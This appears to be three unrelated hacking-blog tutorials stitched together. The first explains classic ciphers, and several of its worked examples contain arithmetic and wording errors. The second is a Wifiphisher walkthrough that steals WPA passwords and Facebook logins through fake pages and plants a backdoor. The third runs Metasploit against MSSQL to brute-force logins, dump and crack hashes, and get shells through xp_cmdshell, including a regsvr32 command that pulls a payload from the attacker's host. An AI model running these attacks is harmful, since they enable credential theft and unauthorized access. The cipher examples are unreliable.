Beginner Guide to Classic Cryptography

Cryptography:  It is a technique of scrambling message using mathematical logic to keep the information secure. It preserve the scrambled message from being hacked when transport over unsecure network. Since it convert the readable message in unreadable text.

Plaintext: It is the content of data which is in readable form that need to share over insecure network.

Encrypting key: It is random string of bits created particularly to scramble the plaintext information into unreadable text using mathematical logic. There are two types of encryption key symmetric key and asymmetric key.

Cipher text: The output of encryption produce cipher text which in not readable by human beings.

Decrypting key: It is the key which use to decipher the cipher text into again plaintext using symmetric or asymmetric key to read original message

.

Functionality of cryptosystem

·         Authentication: It is the process of verification of the identity of the valid person through his username and password that communicates over a network.

·         Authorization: It refers to the process of granting or denying access to a network resource or service. Most of the computer security systems that we have today are based on a two-step mechanism. The first step is authentication, and the second step is authorization or access control, which allows the user to access various resources based on the user’s identity.

·         Confidentiality or privacy: It means the assurance that only authorized users can read or use confidential information. When cryptographic keys are used on plaintext to create cipher text, privacy is assigned to the information.

·         Integrity: Integrity is the security aspect that confirms that the original contents of information have not been altered or corrupted. There should be not any kind of modification with information while it transport over network.

·         Non repudiation: Non repudiation makes sure that each party is liable for its sent message. Someone can communicate and then later either falsely deny the communication entirely or claim that it occurred at a different time, or even deny receiving any piece of information.

Classical Cryptographic Algorithms types

Caesar cipher

Caesar cipher is a type of substitution cipher in which each letter of the alphabet is swap by a letter a certain distance away from that letter.

Algorithm

Step 0: Mathematically, map the letters to numbers (i.e., A = 1, B = 2, and so on).

Step 1: Select an integer key K in between 1 and 25 (i.e., there are total 26 letters in the English language) let say shift right 3 alphabets where A +3 = D, B+3 = E and so on.

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26.

For example encryption of “IGNITE” will like as:

C = E (L+K) %26

Here L= I and K = 3

C = E (I+3) % 26

C = E (9+3) % 26

C = E (12) % 26

C = E (L)

Hence encryption of IGNITE: LJQLWH

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “LJQLWH” will like as:

C = D (L-K) %26

C = D (L-3) % 26

C = D (12-3) % 26

C = D (9) % 26

C = D (I)

Hence decryption of LJQLWH: IGNITE

Limitation: Caesar cipher is vulnerable to brute-force attack because it depends on a single key with 25 possible values if the plaintext is written in English. Consequently, by trying each option and checking which one results in a meaningful word, it is possible to find out the key. Once the key is found, the full cipher text can be deciphered accurately.

Monoalphabetic Cipher

It is also a type of substitution cipher in which each letter of the alphabet is swap by using some permutation of the letters in alphabet. Hence permutations of 26 letters will be 26! (Factorial of 26) and that is equal to 4x10²⁶. This technique uses a random key for every single letter for encryption and which makes the monoalphabetic cipher secure against brute-force attack.

The sender and the receiver decide on a randomly selected permutation of the letters of the alphabet. For example in word “HACKING” replace G from “J” and N from “W” hence permutation key is 2! i.e. factorial of 2 and HACKING will become “HACKJIW”.

Algorithm

Step 0: Generate plaintext–cipher text pair by mapping each plaintext letter to a different random cipher text letter IJKLQR--------GFE.

Step 1: To encipher, for each letter in the original text, replace the plaintext letter with a cipher text letter.

Hence encryption of “IGNITE” will be as shown below:

Step 2: For deciphering, reverse the procedure in step 1.

Hence decryption of “USBUOQ” will be “IGNITE”

Limitations

Despite its advantages, the random key for each letter in monoalphabetic substitution has some downsides too. It is very difficult to remember the order of the letters in the key, and therefore, it takes a lot of time and effort to encipher or decipher the text manually. Monoalphabetic substitution is vulnerable to frequency analysis.

Playfair Cipher

It encrypts digraphs or pairs of letters rather than single letters like the plain substitution cipher

In this cipher a table of alphabet is 5x5 grids is created which contain 25 letters instead of 26. One alphabet “J” (or any other) is omitted. One would first fill in the spaces in the table with the letters of the keyword (dropping any duplicate letters), then fill the remaining spaces with the rest of the letters of the alphabet in order. If the plaintext () contains J, then it is replaced by I.

Algorithm

Step 0: Split the plaintext into pair, if number of letters are odd then add “X” with last letter of plaintext

For example “TABLE” is our plaintext split it into pair as: TA BL EX

Step 1: Set the 5 × 5 matrix by filling the first positions with the key. Fill the rest of the matrix with other letters. Let assume “ARTI” is our key for encryption.

Step 2: For encryption it involves three rules:

If both letters fall in the same row, substitute each with the letter to its right in a circular pattern. TA-----> IR

(1)    If both letters fall in the different row and column, form a rectangle with the two letters and take the letters on the horizontal opposite corner of the rectangle. BL-----> TN

(1)    If both letters fall in the same column, substitute each letter with the letter below it in a circular pattern. EX-----> LT

Hence encryption of word “TABLE” is “IR TN LT”.

Step 3: For decryption receiver use same key to decipher the text by reversing above three rules used in step 2.

Limitations:

Playfair is considerably complicated to break; it is still vulnerable to frequency analysis because in the case of Playfair, frequency analysis will be applied on the 25*25 = 625 possible digraphs rather than the 25 possible monographs (monoalphabetic)

Polyalphabetic Cipher

A polyalphabetic substitution cipher is a series of simple substitution ciphers. It is used to change each character of the plaintext with a variable length. The Vigenere cipher is a special example of the polyalphabetic cipher.

Algorithm

Step 0: Decide a encrypting key to change plaintext into cipher, for example take “HACKING” as encryption key whose numerical representation is “7, 0 ,2 ,10, 8, 13, 6 “

Step 1: To encrypt, the numeric number of first letter of the key encrypts the first letter of the plaintext, the second numeric number of second letter of the key encrypts the second letter of the plaintext, and so on.

For example plaintext is “VISIT TO HACKING ARTICLES” and key is “HACKING: 7 0 2 10 8 13 6”

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26

C = E (L+K) %26

Here L=V and K =7

C = E (V+7) %26

C = E (21+7) %26

C = E (28) %26

C = E (2)

C = E (C)

Hence encryption of “VISIT TO HACKING ARTICLES” is “CIUSBGUOAEUQAMHRVSKYKZ”

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “CIUSBGUOAEUQAMHRVSKYKZ” will like as:

C = D (L-K) %26

Here L=C and K =7

C = E (C-7) %26

C = E (21)

C = E (V)

Hence decryption of “CIUSBGUOAEUQAMHRVSKYKZ” is “VISIT TO HACKING ARTICLES”

Limitation

The main limitation of the Vigenère cipher is the repeating character of its key. If a cryptanalyst properly estimate the length of the key, then the cipher text can be treated as link Caesar ciphers, which can be easily broken separately.

Rotation cipher

In rotation cipher generates cipher text on the behalf of block size and angle of rotation of plain text in the direction of following angles: 90^o 180⁰ 270^o 

Algorithm

Step 0: Decide the size of block for plaintext “CRYPTOGRAPHY”, let assume 6 as block size for it.

CRYPTO

GRAPHY

Step 1: For encryption arrange plaintext in any direction among these angles 90^o 180⁰ 270^o   as shown below:

·         In 90^o Rotation place starting letter downwards vertically from G to C and so on.

CRYPTO

GRAPHY

·         In 180^o Rotation place letter right to left horizontally from O to C and so on.

CRYPTO	OTPYRC
GRAPHY	YHPARG

·         In 270^o Rotation place last letter top to bottom vertically from O to Y and so on.

CRYPTO

GRAPHY

Hence cipher text will arrange in following ways:

Step 2: arrange letter according their angles represents:

90^o   rotated cipher “GCRRAYPPHTYO”

180^o   rotated cipher “YHPARGOTPYRC”

270^o   rotated cipher “OYTHPPYARRCG”

Step 3: for decryption using block size and angle of rotation among all above three cipher texts can be decrypt.

Transposition cipher

In transposition cipher plaintext are rearrange without replacing original letter from other as compare to above cipher techniques.

Algorithm

Step 0: Decide the keyword that will be represent the number of column of a table which store plain text inside it, and help in generating cipher text, let suppose we choose CIPHER as key.

Step 1: store plaintext “classical cryptography” in a table from left to right cell.

Step 2: for encryption arrange all letters according to columns from in ascending order of keyword “CIPHER” will be CEHIPR as:

Column 1: CCCPP

Column2: ESRR

Column 3: HSCG

Column 4: PALOY

Column 5: RIYA

Hence the cipher obtain will be “CCCPPESRRHSCGPALOYRIYA”

Step 3: for decryption receiver use key to rearrange 26 cipher letters according to its column in 6*5 matrix.

Limitation

It was very easy to rearrange cipher letter if correct key is guesses.

Rail fence cipher

The 'rail fence cipher' also called a zigzag cipher is a form of transposition cipher the plain text is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when we reach the bottom rail. 

Algorithm

Step 0: choose the number rails which will act as key for plotting the plaintext on it. Here 3 rails is decided as key for encryption

Step 1: plot plaintext “RAJ CHANDEL” on the rail in zigzag form, in direction top to bottom (downwards and diagonally) and then bottom to up (upwards and diagonally)

Step 2: for encryption place all letter horizontally starting form row 1 to row 3 as:

Row 1: RHE

Row 2: ACADL

Row 3: JN

Hence encryption for “RAJCHANDEL” is “RHEACADLJN”

Step 3: for decryption generate the matrix by multiplying total cipher text with number of rail, here

Total 10 letters are in cipher text “RHEACADELJN” and 3 rails, hence matrix will of 10*3.

 Transverse the above rule use in encryption and place the cipher text as

Row 1: RHE

Row 2: ACADL

Row 3: JN

Limitations

The rail fence cipher is not very strong; the number of practical keys (the number of rails) is small enough that a cryptanalyst can try them all by hand.

WiFi Exploitation with WifiPhisher

Hello friends! Today we are going demonstrate WIFI- Phishing attack by using very great tool “WIFIphisher”, please read its description for more details.

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement

·         Kali Linux.

·         Two wifi adapter; one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

1.       Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.

2.       Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs "known" open networks to cause automatic association.

3.       Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

Let’s start!!!

Open the terminal in your Kali Linux and type following command for downloading wifiphisher from git hub.

git clone https://github.com/wifiphisher/wifiphisher.git

Once it get downloaded run python file to install its setup and dependency as shown below:

cd wifiphisher/

python setup.py install

Now run the script by typing wifiphisher on terminal to launch wifi-phishing attack which as similar as social engineering.

Here it will fetch all interfaces as shown in given image and let attacker to choose any one ESSID/BSSID of the target network and try to trap victim by performing phishing. It will also perform both Evil Twin and KARMA attacks.

From list of interface, I had targeted “iball-baton” to trap the victim connect from it.

After than you will get 4 phishing scenarios to trap your target as given below:

1.       Firmware Upgrade page

2.       Network Manager connect

3.       Browser plugin update

4.       Oauth login Page

Now let’s go through each phishing scenario one by one starting from 1^st option.

Firmware Upgrade page: A router configuration page without logos or brands asking for WPA/WPA2 password due to a Firmware Upgrade page.

Now when victim will open his browser Firefox he will get a phishing page to upgrade firmware that need WPA/WPA2 password for installing new version of firmware.

The victim may consider it as an official notification and go for upgrading by submitting his WIFI password. As the victim enter the password for WPA/WPA2 and click on start upgrade, he will get trap into fake upgrade process.  

Following image is pretending to the victim that firmware is being upgrade don’t close the process until it completed while at background the attacker has captured the WPA/WPA2 password.

Great!! You can confirm the WPA/WPA2 password as shown in given below image, it is showing WPA –password: ram123456ram

Once again repeat the same step to select ESSID.

Now let us go through another phishing scenario from 2^nd option.

Network Manager Connect: Imitates the behavior of the network manager. This templates show’s chrome “connection Failed” page and displays a network manager window through the page asking for pre=shared key. Currently, the network managers of windows and Mac Os are supported.  

Now when the victim will open browser he will get a fake page for “connection failed” and more over a fake window for network manager.

Here target will click on “connect” to reconnect with interface.

It asks to enter the password for connection with selected interface while at background the attacker will captured the WPA/WPA2 password. 

Great!!  Again you can confirm the WPA/WPA2 password as shown in given below image, it has captured WPA –password: ram123456ram

Repeat same step to choose ESSID for attack.

Browser plugin update: A generic browser plugin update page that can be used to serve payloads to the victims.

It will create an exe payload and run multi handler in background for reverse connection of victim system.

Now when again victim will open browser he will get another fake page for Update plugins as shown in given image where it recommended to update the flash player which is outdated. 

Now when the victim will click on Update Now, it will start downloading an update.exe file into victim’s system which is nothing but an exe backdoor file for making unauthorized access in his system.

Awesome!! Attacker will get reverse connection of target’s system, from given below image you can see it has open meterpreter session 1.

Repeat same step to choose ESSID for attack.

Now move forward with its last option i.e. 4^th option.

OAuth Login Page: A free WI-FI service asking for facebook credential to authenticate using OAuth.

At this time when victim will open browser he may get trap into phishing page set as “Get Connect to the Internet For free” as shown in given image.

So when victim will enter his facebook credential for accessing free internet he will get trap in that phishing attack.

Here you can see as victim enters username with password and click on login for facebook connection he got an error message mean while attacker has capture victim’s facebook credential.

Wonderful!! Attacker successfully traps the victim and fetched his facebook account credential.

MSSQL Penetration Testing with Metasploit

Hello friends today we are performing MSSQL penetration testing using metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.1.104

msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(mssql_login) > run

This will perform brute force attack matching valid combination for username and password from given dictionary.

In specified image you can observe that we had successfully retrieve credential for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration setting

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum) >set password admin123

msf auxiliary(mssql_enum) >run

Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:

Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute operating system command. Attacker can inject malicious command of file for making unauthorized access into server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

use auxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins) >set rhosts 192.168.1.104

msf auxiliary(mssql_enum_sql_logins) > set password admin123

msf auxiliary(mssql_enum_sql_logins) > run

From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_dbowner) > set password admin123

msf auxiliary(mssql_escalate_dbowner) >run

Above module will identify whether specified user do have system administrator role or not. From given below image you can perceive that “sa” is sysadmin user.

Identify a User With masquerade privilege

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

use auxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_execute_as) > set password admin123

msf auxiliary(mssql_escalate_execute_as) > run

From given below image you can perceive that “sa” is sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.

use auxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql) > set rhosts 192.168.1.104

msf auxiliary(mssql_sql) > set password admin123

msf auxiliary(mssql_sql) > run

From given below image you can observe that by default it has run SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own sql statement. 

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump

 msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104

msf auxiliary(mssql_hashdump) > set password admin123

msf auxiliary(mssql_hashdump) > run

From given below image you can read the hash value of password set for every database user in MMSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast) > run

Great!!  The tool John the ripper has successfully decoded the hash value set for passwords.

Extracting MYSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104

msf auxiliary(mssql_schemadump) > set password admin123

msf auxiliary(mssql_schemadump) > run

Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:

DB: ignite

Table name: student_details

Ranking (CT: Numeric ; CL =9)

NAME  (CT: nvarchar; CL =100)

Class  (CT: nchar; CL : =20)

Name  (CT: sysname; CL: = 100)

Execute malicious .dll code through xp-cmdshell as CMD statement

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115

msf exploit(regsvr32_applocker_bypass_server) > set lport 4455

msf exploit(regsvr32_applocker_bypass_server) > run

Since we known xp_cmdshell function is enabled in SQL server therefore we can easy shoot the target machine by injecting a malicious .dll file through xp_cmdshell function.

After executing above module we will get malicious .dll code as highlighted in the below image, copy this code for injecting into xp_cmdshell as statement.

This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module

use auxiliary/admin/mssql/mssql_exec

msf auxiliary(mssql_exec) > set rhosts 192.168.1.104

 msf auxiliary(mssql_exec) > set password admin123

msf auxiliary(mssql_exec) >set CMD “regsvr32 /s /n /u /i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll”

msf auxiliary(mssql_exec) >run

If you will observe above command sets in specified module, you will notice that here we have set above copied malicious .dll code as CMD statement. Hence as soon as we will run this exploit it creates a backdoor in victim’s machine for unauthorized access.

Wonderful!! We have got reverse connection of target machine through meterpreter session.

Exploit xp_cmdshell vulnerability

This module executes an arbitrary payload on a Microsoft SQL Server by using the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.

use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) >set rhost 192.168.1.104

msf exploit(mssql_payload) >set password admin123

msf exploit(mssql_payload) >set srvhost 192.168.1.115

msf exploit(mssql_payload) >run

Awesome!!  Once again we have got reverse connection of target machine through meterpreter session.